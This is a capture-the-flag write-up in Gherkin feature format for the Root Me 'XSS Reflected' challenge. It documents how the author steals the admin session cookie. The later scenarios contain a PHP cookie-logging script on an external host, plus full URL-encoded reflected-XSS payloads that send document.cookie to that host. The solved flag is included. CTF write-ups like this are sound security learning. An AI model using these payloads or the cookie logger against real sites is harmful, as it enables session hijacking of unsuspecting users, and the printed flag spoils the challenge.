## Version 2.0
## language: en

Feature:  Web Client - Root Me
  Site:
    www.root-me.org
  Category:
    Web Client
  User:
    jdanilo7
  Goal:
    Steal the admin session cookie using reflected XSS

  Background:
  Hacker's software
    |     <Software name>      |    <Version>    |
    |     Firefox Quantum      |    60.2.0esr    |
    |        Kali Linux        |      4.18       |
  Machine information:
    Given The challenge url
    """
    https://www.root-me.org/en/Challenges/Web-Client/XSS-Reflected
    """
    And The challenge statement
    """
    Find a way to steal the administrator’s cookie.
    Be careful, this administrator is aware of info security and he does not
    click on strange links that he could receive.
    """
    Then I am redirected to the challenge website
    """
    http://challenge01.root-me.org/web-client/ch26/
    """

  Scenario: Fail: Inject testing script
    Given the challenge website
    Then I notice there is a Menu button on the left
    And one of the options is a "Contact us" link
    Given I click on it
    And I am redirected to a page with a form and this information
    """
    Like most businesses, nobody actually checks any of this feedback, but in
    order to look like we care, we have made a totally useless form you can
    fill out.
    """
    Then I conclude I cannot use the form to solve the challenge.
    Given I look at the contact page URL
    """
    http://challenge01.root-me.org/web-client/ch26/?p=contact
    """
    And I notice there is a parameter that might be suceptible to injections
    Then I enter this URL in the search bar
    """
    http://challenge01.root-me.org/web-client/ch26/?p=contact<script>
    alert(document.cookie);</script>
    """
    And I am redirected to a custom 404 - Not Found page
    And my parameter is displayed as a clickable link
    And there is a REPORT TO THE ADMINISTRATOR button, RTAb for short
    And it can be seen in [evidence](report-page.png)
    Then I conclude the vulnerability is linked to the button
    Given I click the RTAb
    Then I am redirected to a Thank you for your report page with this link
    """
    http://challenge01.root-me.org/web-client/ch26/?p=report&url=http%3A%2F%2F
    challenge01.root-me.org%2Fweb-client%2Fch26%2F%3Fp%3Dcontact%253Cscript%25
    3Ealert%28document.cookie%29%3B%253C%2Fscript%253E
    """
    And I get no alert message but notice there is another parameter
    And that it may be susceptible to injections

  Scenario: Fail: Redirect to a malicious domain
    Given the challenge website
    And a php file named cookiestealer.php
    And hosted on a personal domain at https://www.000webhost.com
    """
    1  <?php
    2    header ('Location:https://google.com');
    3    $cookies = $_GET["c"];
    4    $file = fopen('log.txt', 'a');
    5    fwrite($file, $cookies . "\n\n");
    6  ?>
    """
    Then I enter an encoded payload into the url parameter
    """
    http%3A%2F%2Fchallenge01.root-me.org%2Fweb-client%2Fch26%2F%3Fp%3Dcontactt
    %253Cscript%253Edocument.write%28%2527%253Cimg%2520src%3D%2522https%3A%2F%
    2Fcookiesgather.000webhostapp.com%2Fcookiestealer.php%3Fc%3D%2527%2520%2B%
    2520document.cookie%2520%2B%2520%2527%2522%2520%2F%253E%2527%29%253C%2Fscr
    ipt%253E
    """
    And I am redirected to the Thank you for your report page
    Given I check the log.txt file from my personal domain
    Then I notice it was not updated

  Scenario: Success: Redirect to a malicious domain using an event payload
    Given the challenge website
    And a php file named cookiestealer.php
    And hosted on a personal domain at https://www.000webhost.com
    """
    1  <?php
    2    $cookies = $_GET["c"];
    3    $file = fopen('log.txt', 'a');
    4    fwrite($file, $cookies . "\n\n");
    5  ?>
    """
    Then I enter this payload into the url parameter
    """
    http://challenge01.root-me.org/web-client/ch26/?p=reportt' onmouseover=
    'window.location.href="https://cookiesgather.000webhostapp.com/
    cookiestealer.php?c=".concat(document.cookie)' ignoreme='&lt;&gt;
    """
    And it is encoded as
    """
    http://challenge01.root-me.org/web-client/ch26/?p=report&url=http%3A%2F%2F
    challenge01.root-me.org%2Fweb-client%2Fch26%2F%3Fp%3Dreportt%2527%2520onmo
    useover%3D%2527window.location.href%3D%2522https%3A%2F%2Fcookiesgather.000
    webhostapp.com%2Fcookiestealer.php%3Fc%3D%2522.concat%28document.cookie%29
    %2527%2520ignoreme%3D%2527%26lt%3B%26gt%3B
    """
    And I am redirected to the Thank you for your report page
    Given I wait for three minutes
    And check the log.txt file from my personal domain
    Then I see the admin cookie was added at the bottom
    """
    flag=r3fL3ct3D_XsS_fTw
    """
    Then I validate the cookie value on the challenge website
    And it is accepted
